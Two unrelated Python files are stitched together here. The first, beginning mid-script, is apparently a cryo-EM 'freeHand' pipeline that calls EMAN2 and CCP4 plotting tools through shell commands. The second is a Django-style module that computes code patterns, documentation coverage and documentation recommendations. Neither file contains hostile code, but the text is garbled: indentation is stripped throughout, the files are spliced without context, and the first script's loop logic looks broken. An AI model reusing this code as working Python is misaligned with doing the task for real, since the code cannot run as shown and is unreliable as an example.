angSearch = fs3[2]
p18 = open(param,'r')
fs1 = 'calc'
fs2 = grep(fs1,p18)
fs3 = fs2.split()
calc = fs3[2]
p18 = open(param,'r')
fs1 = 'tilt_ang'
fs2 = grep(fs1,p18)
fs3 = fs2.split()
tilt_ang = int(fs3[2])
tiltCenter = [tilt_ang,0]
includedPercentTilt = 40
mod = 1
while mod <= num_mod:
mod = mod - 1
#Merge stacks:
m = 0
num = len(glob.glob('model%02d_plots*.mrc'%(mod)))
i = 1
while i <= int(num):
cmd = 'e2proc2d.py model%02d_plots_CC_v101_%02d.mrc model%02d_plots_CC_v101_%02d.img --threed2twod' %(mod,i,mod,i)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
cmd = 'rm model%02d_plots_CC_v101_%02d.mrc' %(mod,i)
subprocess.Popen(cmd,shell=True).wait()
cmd = 'proc2d model%02d_plots_CC_v101_%02d.img model%02d_plots_CC_v101_merge.img' %(mod,i,mod)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
i = i + 1
cmd = 'e2proc2d.py model%02d_plots_CC_v101_merge.img model%02d_plots_CC_v101_merge.mrc --twod2threed' %(mod,mod)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
cmd = 'cp %s/totsumstack.exe .' %(cwd)
subprocess.Popen(cmd,shell=True).wait()
totsum = '#!/bin/csh\n'
totsum += 'totsumstack.exe << eot\n'
totsum += 'model%02d_plots_CC_v101_merge.mrc\n' %(mod)
totsum += 'model%02d_averageplot_CC_v101.mrc\n' %(mod)
totsum += 'eot\n'
tmp = open('tmp.csh','w')
tmp.write(totsum)
tmp.close()
if debug is True:
print totsum
cmd = 'chmod +x tmp.csh'
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True)
cmd = './tmp.csh'
subprocess.Popen(cmd,shell=True).wait()
cmd = 'rm totsumstack.exe tmp.csh '
subprocess.Popen(cmd,shell=True).wait()
# avgfile = averageStack('model%02d_plots_CC_v101_merge.mrc' %(mod),'model%02d_averageplot_CC_v101.mrc'%(mod))
        if calc == 'C':
line1 = (float(angSearch)*2)/5
line = line1/2
npo = '#!/bin/csh\n'
npo += 'rm -f z.plot\n'
npo += 'rm -f plot84.ps\n'
npo += '%s/bin/npo mapin model%02d_averageplot_CC_v101.mrc plot z.plot << eof\n' %(ccp4_path,mod)
npo += 'NOTITLE\n'
npo += 'MAP SCALE 1 INVERT\n'
npo += '# For CCC\n'
npo += 'CONTRS 0.0 to 1 by 0.002\n'
npo += 'LIMITS 0 %s 0 %s 0 0\n' %(str(float(angSearch)*2),str(float(angSearch)*2))
npo += 'SECTNS 0 0 1\n'
npo += 'GRID 5 5\n'
npo += 'GRID U DASHED 1.0 0.2 0 EVERY %s FULL\n' %(line)
npo += 'GRID V DASHED 1.0 0.2 0 EVERY %s FULL\n' %(line)
npo += 'PLOT Y\n'
npo += 'eof\n'
npo += '\n'
npo += '%s/bin/pltdev -log -dev ps -abs -pen c -xp 3.1 -yp 3.1 -lan -i z.plot -o model%02d_average_frehand_CC.ps\n' %(ccp4_path,mod)
tmp = open('tmp.csh','w')
tmp.write(npo)
tmp.close()
cmd = 'chmod +x tmp.csh'
subprocess.Popen(cmd,shell=True)
cmd = './tmp.csh'
subprocess.Popen(cmd,shell=True).wait()
cmd = 'rm tmp.csh z.plot'
#subprocess.Popen(cmd,shell=True).wait()
findPeak('model%02d_plots_CC_v101_merge.mrc' %(mod),'model%02d_peaks.txt' %(mod))
#scatter('model%02d_peaks.txt' %(mod),angSearch,tiltCenter,includedPercentTilt)
cmd = 'rm -r model%02d_plots_CC_v101_merge.* model%02d_plots_CC_v101_??.* %s_%03d.mrc %s_%02d.mrc' %(mod,mod,model[:-4],mod,stack[:-4],mod)
subprocess.Popen(cmd,shell=True).wait()
        if calc == 'P':
line1 = (float(angSearch)*2)/5
line = line1/2
npo = '#!/bin/csh\n'
npo += 'rm -f z.plot\n'
npo += 'rm -f plot84.ps\n'
npo += '%s/bin/npo mapin model%02d_averageplot_CC_v101.mrc plot z.plot << eof\n' %(ccp4_path,mod)
npo += 'NOTITLE\n'
npo += 'MAP SCALE 1 INVERT\n'
npo += '# For Pres\n'
npo += 'CONTRS 77. to 86. by .3\n'
npo += 'LIMITS 0 %s 0 %s 0 0\n' %(str(float(angSearch)*2),str(float(angSearch)*2))
npo += 'SECTNS 0 0 1\n'
npo += 'GRID 5 5\n'
npo += 'GRID U DASHED 1.0 0.2 0 EVERY %s FULL\n' %(line)
npo += 'GRID V DASHED 1.0 0.2 0 EVERY %s FULL\n' %(line)
npo += 'PLOT Y\n'
npo += 'eof\n'
npo += '\n'
            npo += '%s/bin/pltdev -log -dev ps -abs -pen c -xp 3.1 -yp 3.1 -lan -i z.plot -o model%02d_average_frehand_CC.ps\n' %(ccp4_path,mod)
tmp = open('tmp.csh','w')
tmp.write(npo)
tmp.close()
cmd = 'chmod +x tmp.csh'
subprocess.Popen(cmd,shell=True)
cmd = './tmp.csh'
subprocess.Popen(cmd,shell=True).wait()
cmd = 'rm tmp.csh z.plot'
subprocess.Popen(cmd,shell=True).wait()
cmd = 'proc2d model%02d_plots_CC_v101_merge.img model%02d_plots_CC_v101_merge.img invert inplace' %(mod,mod)
subprocess.Popen(cmd,shell=True).wait()
cmd = 'e2proc2d.py model%02d_plots_CC_v101_merge.img model%02d_plots_CC_v101_merge.spi' %(mod,mod)
subprocess.Popen(cmd,shell=True).wait()
tot = EMUtil.get_image_count('model00_plots_CC_v101_merge.img')
n = int(angSearch)+1
stack1 = 'model%02d_plots_CC_v101_merge.spi'%(mod)
peak(stack1,tot,n)
cmd = 'rm -r model%02d_plots_CC_v101_merge.* model%02d_plots_CC_v101_??.* %s_%03d.mrc %s_%02d.mrc' %(mod,mod,model[:-4],mod,stack[:-4],mod)
subprocess.Popen(cmd,shell=True).wait()
mod = mod + 2
#===================
def format_ctf(ctf):
#Appion files have a numbering scheme within the first column that needs to be removed
#Make backup version
cmd = 'cp %s %s_backup.par' %(ctf,ctf[:-4])
subprocess.Popen(cmd,shell=True).wait()
os.remove('%s' %(ctf))
ctfRead = open('%s_backup.par'%(ctf[:-4]),'r')
ctfOut = open('%s' %(ctf),'w')
for line in ctfRead:
    l = line.split()
    ctfOut.write('%f %f %s\n' %(float(l[1])*10000,float(l[2])*1000,l[3]))
ctfRead.close()
ctfOut.close()
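# Illustrative sketch (not part of the original script): given an Appion-style
# line "1 2.5 3.1 45.0", format_ctf drops the leading index column and rescales
# the next two values, writing "25000.000000 3100.000000 45.0".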
if __name__ == "__main__":
getMYAMI()
from pyami import peakfinder,mrc
getEMANPath()
getOPENMPIPath()
ccp4 = getCCP4Path()
from EMAN2 import *
from sparx import *
params=setupParserOptions()
checkConflicts(params)
cwd = '/archive/michael/lib/freeHand'
if params['appion'] is True:
format_ctf(params['ctf'])
align(params,cwd)
eman2_conv(params,cwd)
fastFree(params,cwd)
plotFH(params,ccp4,cwd)
cmd = 'rm -r refine_eman2'
subprocess.Popen(cmd,shell=True).wait()
|
|
from __future__ import unicode_literals
from collections import defaultdict
import codebase.models as cmodel
import recommender.models as rmodel
import codebase.linker.context as ctx
from docutil.progress_monitor import NullProgressMonitor, CLIProgressMonitor
from docutil.str_util import tokenize
from docutil.commands_util import size
SUPER_REC_THRESHOLD = 0.4
LOCATION_THRESHOLD = 0.5
OVERLOADED_THRESHOLD = 0.5
VALID_COVERAGE_THRESHOLD = 0.5
DOC_PATTERN_LOCATION_THRESHOLD = 0.75
def create_pattern(head, codebase, criterion, first_criterion):
pattern = rmodel.CodePattern(head=head)
if first_criterion:
pattern.criterion1 = criterion
else:
pattern.criterion2 = criterion
pattern.codebase = codebase
pattern.save()
return pattern
def compute_declaration_pattern(code_elements, first_criterion=True,
progress_monitor=NullProgressMonitor()):
'''Go through all code elements and insert each one into a pattern
represented by its container.
'''
patterns = {}
progress_monitor.start('Comp. Declaration patterns', size(code_elements))
for code_element in code_elements:
kind_pk = code_element.kind.pk
for container in code_element.containers.all():
pk = container.pk
key = '{0}-{1}'.format(pk, kind_pk)
if key not in patterns:
patterns[key] = create_pattern(container, container.codebase,
rmodel.DECLARATION, first_criterion)
patterns[key].kind = code_element.kind
patterns[key].save()
patterns[key].extension.add(code_element)
progress_monitor.work('Code Element processed', 1)
progress_monitor.done()
return patterns
def compute_ancestors(code_element, ancestors):
for parent in code_element.parents.all():
if parent.pk not in ancestors:
ancestors[parent.pk] = parent
compute_ancestors(parent, ancestors)
def compute_hierarchy_pattern(code_elements, first_criterion=True,
progress_monitor=NullProgressMonitor()):
'''Go through all code elements and insert each one into a pattern
represented by its direct parent. Then, insert it into a pattern
represented by each of its ancestors.
'''
patterns1 = {}
patternsd = {}
progress_monitor.start('Comp. Hierarchy Patterns', size(code_elements))
for code_element in code_elements:
# Hierarchy 1
for parent in code_element.parents.all():
pk = parent.pk
if pk not in patterns1:
patterns1[pk] = create_pattern(parent, parent.codebase,
rmodel.HIERARCHY, first_criterion)
patterns1[pk].extension.add(code_element)
# Hierarchy D
ancestors_list = ctx.get_ancestors_value(code_element)
ancestors = {ancestor.pk: ancestor for ancestor in ancestors_list}
for ancestor_pk in ancestors:
if ancestor_pk not in patternsd:
patternsd[ancestor_pk] = create_pattern(
ancestors[ancestor_pk],
code_element.codebase,
rmodel.HIERARCHY_D,
first_criterion)
patternsd[ancestor_pk].extension.add(code_element)
progress_monitor.work('Code Element processed', 1)
progress_monitor.done()
return (patterns1, patternsd)
def compute_no_abstract_pattern(patterns,
progress_monitor=NullProgressMonitor()):
'''Go through all patterns. If a proper subset of a pattern's extension is
non-abstract, create a new pattern with non-abstract as the second
criterion.
'''
new_patterns = {}
progress_monitor.start('Comp. No Abstract patterns', len(patterns))
for head_pk in patterns:
pattern = patterns[head_pk]
code_elements = pattern.extension.all()
new_extension = [code_element for code_element in code_elements if
not code_element.abstract]
new_size = len(new_extension)
if new_size > 0 and new_size < pattern.extension.count():
new_pattern = create_pattern(pattern.head, pattern.codebase,
rmodel.NO_ABSTRACT, False)
new_pattern.criterion1 = pattern.criterion1
new_pattern.save()
new_pattern.extension.add(*new_extension)
new_patterns[new_pattern.pk] = new_pattern
progress_monitor.work('pattern processed', 1)
progress_monitor.done()
return new_patterns
def compute_token_pattern_second(patterns,
progress_monitor=NullProgressMonitor()):
'''For each pattern, compute sub patterns based on token.'''
progress_monitor.start('Computing token for a set of patterns',
len(patterns))
token_patterns = {}
for head_pk in patterns:
pattern = patterns[head_pk]
code_elements = pattern.extension.all()
sub_patterns = compute_token_pattern(code_elements, False,
CLIProgressMonitor())
for key in sub_patterns:
sub_pattern = sub_patterns[key]
sub_pattern.head = pattern.head
sub_pattern.criterion1 = pattern.criterion1
sub_pattern.save()
token_patterns[sub_pattern.pk] = sub_pattern
progress_monitor.work('pattern processed.', 1)
progress_monitor.done()
return token_patterns
def compute_tokens(code_elements):
'''Compute a set of all tokens contained in the provided code elements.'''
tokens = set()
for code_element in code_elements.all():
temp = [token.lower().strip() for token in
tokenize(code_element.simple_name)]
tokens.update(temp)
return tokens
def compute_token_pattern(code_elements, first_criterion=True,
progress_monitor=NullProgressMonitor()):
'''For each token, go through all code elements and create three patterns:
code elements that start with a token, elements that end with a token,
and elements that have the token in the middle. This is exclusive.
'''
patterns = {}
if size(code_elements) == 0:
return patterns
codebase = code_elements.all()[0].codebase
tokens = compute_tokens(code_elements)
progress_monitor.start('Processing {0} token for code elements'
.format(len(tokens)), len(tokens))
progress_monitor.info('Computing code element names')
ctokens = []
for code_element in code_elements.all():
name = code_element.simple_name.lower().strip()
element_tokens = [token.lower().strip() for token in
tokenize(code_element.simple_name)]
ctokens.append((name, code_element, element_tokens))
progress_monitor.info('Computed code element names')
for token in tokens:
start = defaultdict(list)
end = defaultdict(list)
middle = defaultdict(list)
if first_criterion:
# Here, we want to avoid mixing classes with methods and fields!
addt = lambda d, e: d[e.kind.pk].append(e)
else:
# Here, we already know that they are part of the same pattern, so
# they don't mix.
addt = lambda d, e: d[0].append(e)
for (name, code_element, element_tokens) in ctokens:
if token not in element_tokens:
continue
elif name.startswith(token):
addt(start, code_element)
elif name.endswith(token):
addt(end, code_element)
elif name.find(token) > -1:
addt(middle, code_element)
#print('Debugging {0}: {1} {2} {3}'.format(token, len(start), len(end),
#len(middle)))
for start_extension in start.values():
if len(start_extension) > 1:
pattern = create_pattern(None, codebase, rmodel.TOKEN,
first_criterion)
pattern.token = token
pattern.token_pos = rmodel.PREFIX
pattern.save()
pattern.extension.add(*start_extension)
patterns[pattern.pk] = pattern
if first_criterion:
pattern.kind = start_extension[0].kind
pattern.save()
for end_extension in end.values():
if len(end_extension) > 1:
pattern = create_pattern(None, codebase, rmodel.TOKEN,
first_criterion)
pattern.token = token
pattern.token_pos = rmodel.SUFFIX
pattern.save()
pattern.extension.add(*end_extension)
patterns[pattern.pk] = pattern
if first_criterion:
pattern.kind = end_extension[0].kind
pattern.save()
for mid_extension in middle.values():
if len(mid_extension) > 1:
pattern = create_pattern(None, codebase, rmodel.TOKEN,
first_criterion)
pattern.token = token
pattern.token_pos = rmodel.MIDDLE
pattern.save()
pattern.extension.add(*mid_extension)
patterns[pattern.pk] = pattern
if first_criterion:
pattern.kind = mid_extension[0].kind
pattern.save()
progress_monitor.work('Processed a token')
progress_monitor.done()
return patterns
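# Illustrative sketch (not from the original module), assuming tokenize()
# splits camel-case names: for the token 'list', an element named 'ListAdapter'
# lands in the prefix bucket (name.startswith), 'ArrayList' in the suffix
# bucket (name.endswith), and 'LinkedListNode' in the middle bucket
# (name.find), mirroring the classification above.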
def compute_coverage(patterns, source, resource,
progress_monitor=NullProgressMonitor()):
'''For each pattern, compute coverage (linked elements / total elements).
'''
progress_monitor.start('Computing Coverage', size(patterns))
for pattern in patterns.all():
total = pattern.extension.count()
count = 0
pk = resource.pk
for member in pattern.extension.all():
if cmodel.CodeElementLink.objects.\
filter(code_element=member).\
filter(index=0).\
filter(code_reference__resource_object_id=pk).\
filter(code_reference__source=source).exists():
count += 1
if total > 0:
coverage = float(count) / float(total)
else:
coverage = 0.0
pat_coverage = rmodel.CodePatternCoverage(pattern=pattern,
resource=resource, source=source, coverage=coverage)
pat_coverage.save()
progress_monitor.work('Processed a pattern', 1)
progress_monitor.done()
def filter_coverage(patterns_query):
patterns_query.filter(coverage__lt=VALID_COVERAGE_THRESHOLD).\
update(valid=False)
for coverage in patterns_query.filter(valid=True).iterator():
count = coverage.pattern.extension.count()
# Eliminate coverages where only one element is covered (e.g. 2 * 0.5).
# Others are already eliminated by the threshold filter above.
if count == 1 or coverage.coverage * count == 1.0:
coverage.valid = False
coverage.save()
def combine_coverage(coverages, progress_monitor=NullProgressMonitor()):
    '''Greedily combine pattern coverages into documentation patterns: starting
    with the pattern that has the largest extension, absorb any later coverage
    whose extension is a subset of the current pattern's extension.
    '''
coverages_list = list(coverages.all())
coverages_list.sort(key=lambda c: c.pattern.extension.count(),
reverse=True)
doc_patterns = []
processed_coverage = set()
cov_len = len(coverages_list)
progress_monitor.start('Processing {0} patterns'.format(cov_len), cov_len)
for i, coverage in enumerate(coverages_list):
if coverage.pk in processed_coverage:
progress_monitor.work('Skipped pattern', 1)
continue
current_best_cov = coverage.coverage
processed_coverage.add(coverage.pk)
doc_pattern = rmodel.DocumentationPattern()
doc_pattern.save()
doc_pattern.patterns.add(coverage)
doc_patterns.append(doc_pattern)
extension = list(coverage.pattern.extension.all())
count = float(len(extension))
for tempcoverage in coverages_list[i + 1:]:
tempcoverage_value = tempcoverage.coverage
if (1.0 - (tempcoverage.pattern.extension.count() / count)) > \
SUPER_REC_THRESHOLD:
# We are too much different in terms of members
# Go to next
if tempcoverage_value > current_best_cov:
# This temp coverage has a better coverage than me, start
# a new doc pattern. There is no way the next will be
# included in this one.
# XXX Is this step even necessary?
break
if proper_subset(list(tempcoverage.pattern.extension.all()),
extension):
if tempcoverage_value > current_best_cov:
current_best_cov = tempcoverage_value
doc_pattern.patterns.add(tempcoverage)
processed_coverage.add(tempcoverage.pk)
doc_pattern.main_pattern = \
get_best_pattern(list(doc_pattern.patterns.all()))
doc_pattern.save()
progress_monitor.work('Processed documentation pattern', 1)
progress_monitor.info('Created {0} documentation patterns'.
format(len(doc_patterns)))
progress_monitor.done()
return doc_patterns
def get_best_pattern(coverages):
def thd_crit(coverage):
pattern = coverage.pattern
if pattern.criterion2 is None:
return 1
else:
return 0
def snd_crit(coverage):
pattern = coverage.pattern
if pattern.criterion1 == rmodel.HIERARCHY_D:
return 1
else:
return 0
def fst_crit(coverage):
pattern = coverage.pattern
if pattern.criterion1 == rmodel.TOKEN:
return 0
else:
return 1
def cvr(coverage):
return coverage.coverage
# Python's sort is stable, so the later sorts take priority: coverage is the
# primary key and the earlier sorts act as successive tie-breakers.
# Final tie-breaker: favor patterns without a second criterion.
coverages.sort(key=thd_crit, reverse=True)
# Tie-breaker: favor hierarchy descendants over simple hierarchy.
coverages.sort(key=snd_crit, reverse=True)
# Secondary key: favor non-token patterns.
coverages.sort(key=fst_crit, reverse=True)
# Primary key: favor higher coverage.
coverages.sort(key=cvr, reverse=True)
return coverages[0]
def compare_coverage(codebase_from, codebase_to, source, resource_pk,
progress_monitor=NullProgressMonitor()):
'''First, match head-based (declaration/hierarchy) and token-based
patterns.
Then, for each matched pattern, compare their coverage.
'''
(heads_from, tokens_from) = compute_pattern_index(codebase_from,
progress_monitor)
(heads_to, tokens_to) = compute_pattern_index(codebase_to, progress_monitor)
removed = []
added = []
heads_patterns_diff = compute_patterns_diff(heads_from, heads_to, added,
removed, progress_monitor)
tokens_patterns_diff = compute_patterns_diff(tokens_from, tokens_to, added,
removed, progress_monitor)
progress_monitor.info('Sorting added/removed')
removed.sort(key=lambda f: f.extension.count(), reverse=True)
added.sort(key=lambda f: f.extension.count(), reverse=True)
progress_monitor.info('Sorting pattern diff')
heads_patterns_diff.sort(key=lambda d: d.extension_diff)
tokens_patterns_diff.sort(key=lambda d: d.extension_diff)
heads_coverage_diff = compute_coverage_diff(heads_patterns_diff, source,
resource_pk, progress_monitor)
tokens_coverage_diff = compute_coverage_diff(tokens_patterns_diff, source,
resource_pk, progress_monitor)
progress_monitor.info('Sorting coverage diff')
# Basically, we want to look at coverage that decreased.
heads_coverage_diff.sort(key=lambda d: d.coverage_diff)
tokens_coverage_diff.sort(key=lambda d: d.coverage_diff)
report_diff(heads_patterns_diff, heads_coverage_diff, 'Head Report')
report_diff(tokens_patterns_diff, tokens_coverage_diff, 'Token Report')
report_add_remove(removed, added)
def compute_pattern_index(codebase, progress_monitor):
'''Compute an index of the patterns based on their head or token.'''
heads = defaultdict(list)
tokens = defaultdict(list)
patterns = rmodel.CodePattern.objects.filter(codebase=codebase)
progress_monitor.start('Computing pattern index for codebase {0}'
.format(codebase), patterns.count())
for pattern in patterns.all():
if pattern.head is not None:
heads[pattern.head.human_string()].append(pattern)
else:
tokens[pattern.token].append(pattern)
progress_monitor.work('Computed a pattern index', 1)
progress_monitor.done()
return (heads, tokens)
def compute_patterns_diff(index_from, index_to, added, removed,
progress_monitor):
'''For each index and each pattern, try to find a matching pattern based on
pattern.equiv.
'''
processed = set()
pattern_diffs = []
progress_monitor.start('Computing pattern diff', len(index_from))
for key in index_from:
for pattern_from in index_from[key]:
pattern_to = get_pattern(pattern_from, index_to, key)
if pattern_to is None:
removed.append(pattern_from)
else:
diff = rmodel.PatternDiff(pattern_from=pattern_from,
pattern_to=pattern_to)
diff.compute_diffs()
diff.save()
pattern_diffs.append(diff)
processed.add(pattern_to.pk)
progress_monitor.work('Computed pattern diffs', 1)
progress_monitor.info('Computing added patterns')
for patterns_to in index_to.values():
for pattern_to in patterns_to:
if pattern_to.pk not in processed:
added.append(pattern_to)
progress_monitor.done()
return pattern_diffs
def compute_coverage_diff(pattern_diffs, source, resource_pk, progress_monitor):
'''For each pattern, get the coverage related to a particular resource.
Note: a pattern in a codebase could have coverage for more than one
document (especially during experimentation/evaluation :-) ).
'''
coverage_diffs = []
progress_monitor.start('Computing coverage diff', len(pattern_diffs))
for pattern_diff in pattern_diffs:
coverage_from = pattern_diff.pattern_from.get_coverage(source,
resource_pk)
coverage_to = pattern_diff.pattern_to.get_coverage(source,
resource_pk)
if coverage_from is None or coverage_to is None:
progress_monitor.info('ERROR! One coverage is none: {0} {1}'
.format(pattern_diff.pattern_from.pk,
pattern_diff.pattern_to.pk))
progress_monitor.work('Skipping coverage diff', 1)
continue
elif not coverage_from.is_interesting():
continue
diff = rmodel.CoverageDiff(coverage_from=coverage_from,
coverage_to=coverage_to)
diff.compute_diffs()
diff.save()
coverage_diffs.append(diff)
progress_monitor.work('Computed coverage diff', 1)
progress_monitor.done()
return coverage_diffs
def report_diff(pattern_diffs, coverage_diffs, report_title):
top = 25
print()
print(report_title)
print('\nREPORTING TOP {0} PATTERN DIFFS\n'.format(top))
print('Total Pattern Diffs: {0}'.format(len(pattern_diffs)))
for pattern_diff in pattern_diffs[:top]:
print('{0}: From: {1}[{2}] To: {3} [{4}]'.
format(pattern_diff.extension_diff, pattern_diff.pattern_from,
pattern_diff.pattern_from.pk, pattern_diff.pattern_to,
pattern_diff.pattern_to.pk))
print('\nREPORTING TOP {0} COVERAGE DIFFS\n'.format(top))
print('Total coverage diffs: {0}'.format(len(coverage_diffs)))
for cov_diff in coverage_diffs[:top]:
print('{0}: From: {1}[{2}] To: {3} [{4}]'.
format(cov_diff.coverage_diff, cov_diff.coverage_from,
cov_diff.coverage_from.pk, cov_diff.coverage_to,
cov_diff.coverage_to.pk))
report_location(cov_diff.coverage_from)
print()
def report_location(coverage):
for member in coverage.pattern.extension.all():
for link in member.potential_links.filter(index=0).all():
if link.code_reference.resource_object_id ==\
coverage.resource_object_id and link.code_reference.source ==\
coverage.source:
print(' {0} in {1}/{2}'.format(member.human_string(),
link.code_reference.local_context,
link.code_reference.global_context))
def report_add_remove(removed, added):
top = 25
print()
print('REPORTING TOP {0} REMOVED PATTERNS\n'.format(top))
for pattern in removed[:top]:
print('{0}: {1}[{2}]'.format(pattern.extension.count(), pattern,
pattern.pk))
print('REPORTING TOP {0} ADDED PATTERNS\n'.format(top))
for pattern in added[:top]:
print('{0}: {1}[{2}]'.format(pattern.extension.count(), pattern,
pattern.pk))
def get_pattern(pattern, index, key):
if key not in index:
return None
else:
for temp_pattern in index[key]:
if pattern.equiv(temp_pattern):
return temp_pattern
return None
def compute_coverage_recommendation(coverage_diffs,
progress_monitor=NullProgressMonitor()):
'''For each coverage diff, check if there is at least one new element in a
pattern that was not there before (release 1) and that is not documented
now (release 2).
For each such coverage diff, create a recommendation.
'''
recommendations = []
diffs_len = size(coverage_diffs)
progress_monitor.start('Processing {0} diffs'.format(diffs_len),
diffs_len)
for coverage_diff in coverage_diffs:
(covered_mem_from, uncovered_mem_from) =\
get_members(coverage_diff.coverage_from)
(_, uncovered_mem_to) = get_members(coverage_diff.coverage_to)
members_to_doc = []
for member_key in uncovered_mem_to:
if member_key not in covered_mem_from and \
member_key not in uncovered_mem_from:
members_to_doc.append(uncovered_mem_to[member_key])
if len(members_to_doc) > 0:
recommendation = rmodel.AddRecommendation(
coverage_diff=coverage_diff)
recommendation.save()
recommendation.new_members.add(*members_to_doc)
recommendation.old_members.add(*covered_mem_from.values())
recommendations.append(recommendation)
progress_monitor.work('Processed diff', 1)
progress_monitor.done()
return recommendations
def get_members(pattern_coverage):
pattern = pattern_coverage.pattern
pk = pattern_coverage.resource_object_id
source = pattern_coverage.source
covered_members = {}
uncovered_members = {}
for member in pattern.extension.all():
if cmodel.CodeElementLink.objects.\
filter(code_element=member).\
filter(index=0).\
filter(code_reference__resource_object_id=pk).\
filter(code_reference__source=source).exists():
covered_members[member.human_string()] = member
else:
uncovered_members[member.human_string()] = member
return (covered_members, uncovered_members)
def compute_super_recommendations(recommendations,
progress_monitor=NullProgressMonitor()):
'''Combine similar recommendations together.
Recommendations are combined if there isn't more than 20% difference and
one is a proper subset of the other.
'''
recommendations.sort(key=lambda r: r.new_members.count(), reverse=True)
processed_recs = set()
super_recs = []
reclen = len(recommendations)
progress_monitor.start('Processing {0} recommendations'.format(reclen),
reclen)
for i, rec in enumerate(recommendations):
if rec.pk in processed_recs:
progress_monitor.work('Skipped rec', 1)
continue
current_best_cov = rec.coverage_diff.coverage_from.coverage
processed_recs.add(rec.pk)
super_rec = rmodel.SuperAddRecommendation(initial_rec=rec,
codebase_from=rec.coverage_diff.coverage_from.pattern.codebase,
codebase_to=rec.coverage_diff.coverage_to.pattern.codebase,
resource=rec.coverage_diff.coverage_from.resource,
source=rec.coverage_diff.coverage_from.source)
super_rec.save()
super_rec.recommendations.add(rec)
super_recs.append(super_rec)
new_members = list(rec.new_members.all())
#count = float(len(new_members))
for temprec in recommendations[i + 1:]:
coverage_from = temprec.coverage_diff.coverage_from.coverage
#if (1.0 - (temprec.new_members.count() / count)) > \
#SUPER_REC_THRESHOLD:
#if coverage_from > current_best_cov:
#break
if proper_subset(list(temprec.new_members.all()), new_members):
if coverage_from > current_best_cov:
current_best_cov = coverage_from
super_rec.recommendations.add(temprec)
processed_recs.add(temprec.pk)
super_rec.best_rec =\
get_best_rec(list(super_rec.recommendations.all()))
check_overloading(super_rec)
super_rec.save()
progress_monitor.work('Processed rec', 1)
progress_monitor.done()
sort_super_recs(super_recs)
for i, super_rec in enumerate(super_recs):
super_rec.index = i
super_rec.save()
return super_recs
def check_overloading(super_rec):
'''We don't want to recommend a new method that is an overloaded version of
an already covered method.'''
overloaded = 0
total = 0
for member in super_rec.best_rec.new_members.all():
total += 1
codebase = member.codebase
if member.kind.kind != 'method':
continue
if codebase.code_elements.filter(fqn=member.fqn).count() > 1:
overloaded += 1
if float(overloaded) / float(total) > OVERLOADED_THRESHOLD:
super_rec.overloaded = True
def proper_subset(members1, members2):
    '''Return True if members1 is a (not necessarily proper) subset of
    members2, comparing members by their human-readable string.'''
members1set = {member.human_string() for member in members1}
members2set = {member.human_string() for member in members2}
return members1set <= members2set
def get_best_rec(recommendations):
def thd_crit(rec):
pattern = rec.coverage_diff.coverage_from.pattern
if pattern.criterion2 is None:
return 1
else:
return 0
def snd_crit(rec):
pattern = rec.coverage_diff.coverage_from.pattern
if pattern.criterion1 == rmodel.HIERARCHY_D:
return 1
else:
return 0
def fst_crit(rec):
pattern = rec.coverage_diff.coverage_from.pattern
if pattern.criterion1 == rmodel.TOKEN:
return 0
else:
return 1
def cvr(rec):
return rec.coverage_diff.coverage_from.coverage
recommendations.sort(key=thd_crit, reverse=True)
recommendations.sort(key=snd_crit, reverse=True)
recommendations.sort(key=fst_crit, reverse=True)
recommendations.sort(key=cvr, reverse=True)
return recommendations[0]
def sort_super_recs(super_recommendations):
def snd_crit(super_rec):
pattern = super_rec.best_rec.coverage_diff.coverage_from.pattern
if pattern.criterion2 is None:
return 1
else:
return 0
def fst_crit(super_rec):
pattern = super_rec.best_rec.coverage_diff.coverage_from.pattern
if pattern.criterion1 == rmodel.TOKEN:
return 0
else:
return 1
def cvr(super_rec):
return super_rec.best_rec.coverage_diff.coverage_from.coverage
super_recommendations.sort(key=snd_crit, reverse=True)
super_recommendations.sort(key=fst_crit, reverse=True)
super_recommendations.sort(key=cvr, reverse=True)
def report_super(super_recs):
for super_rec in super_recs:
(sections, pages, section_spread, page_spread) = \
get_locations(super_rec)
print('\nSUPER REC: {0}'.format(super_rec))
for member in super_rec.best_rec.new_members.all():
print(' to document: {0}'.format(member.human_string()))
if super_rec.overloaded:
print('\n **Overloaded recommendation**')
print('\n Important Pages:')
for (page, members) in pages:
old_count = super_rec.best_rec.old_members.count()
covered = len(members)
print(' {0}: {1} / {2}'.format(page.title, covered, old_count))
#for member in members:
#print(' {0}'.format(member.human_string()))
if page_spread:
print('\n **New members will probably be added in new pages**')
print('\n Important Sections:')
for (section, members) in sections:
old_count = super_rec.best_rec.old_members.count()
covered = len(members)
print(' {0}: {1} / {2}'.format(section.title,
covered, old_count))
#for member in members:
#print(' {0}'.format(member.human_string()))
if section_spread:
print('\n **New members will probably be added in new sections**')
if not section_spread and not page_spread:
print('\n **New members will probably be added in most popular '
'section**')
for rec in super_rec.recommendations.all():
print(' subrec: {0}'.format(rec))
def get_locations(super_rec):
sections = ()
pages = ()
section_spread = False
page_spread = False
sections_objects = {}
pages_objects = {}
sectionsd = defaultdict(list)
pagesd = defaultdict(list)
resource_pk = super_rec.resource_object_id
source = super_rec.source
count = 0
for member in super_rec.best_rec.old_members.all():
visited_sections = set()
visited_pages = set()
for link in member.potential_links.filter(index=0).all():
if link.code_reference.resource_object_id == resource_pk and\
link.code_reference.source == source:
section = link.code_reference.local_context
page = link.code_reference.global_context
if section.pk not in visited_sections:
sections_objects[section.pk] = section
sectionsd[section.pk].append(member)
visited_sections.add(section.pk)
if page.pk not in visited_pages:
pages_objects[page.pk] = page
pagesd[page.pk].append(member)
visited_pages.add(page.pk)
count += 1
sections = [(sections_objects[pk], sectionsd[pk]) for pk in sectionsd]
pages = [(pages_objects[pk], pagesd[pk]) for pk in pagesd]
# Sort them
sections.sort(key=lambda v: len(v[1]), reverse=True)
pages.sort(key=lambda v: len(v[1]), reverse=True)
section_spread = (len(sections[0][1]) / float(count)) < LOCATION_THRESHOLD
page_spread = (len(pages[0][1]) / float(count)) < LOCATION_THRESHOLD
return (sections, pages, section_spread, page_spread)
def get_locations_coverage(coverage):
sections = ()
pages = ()
sections_objects = {}
pages_objects = {}
sectionsd = defaultdict(list)
pagesd = defaultdict(list)
resource_pk = coverage.resource_object_id
source = coverage.source
count = 0
member_locations = {}
for member in coverage.pattern.extension.all():
visited_sections = set()
visited_pages = set()
member_sections = set()
member_pages = set()
for link in member.potential_links.filter(index=0).all():
if link.code_reference.resource_object_id == resource_pk and\
link.code_reference.source == source:
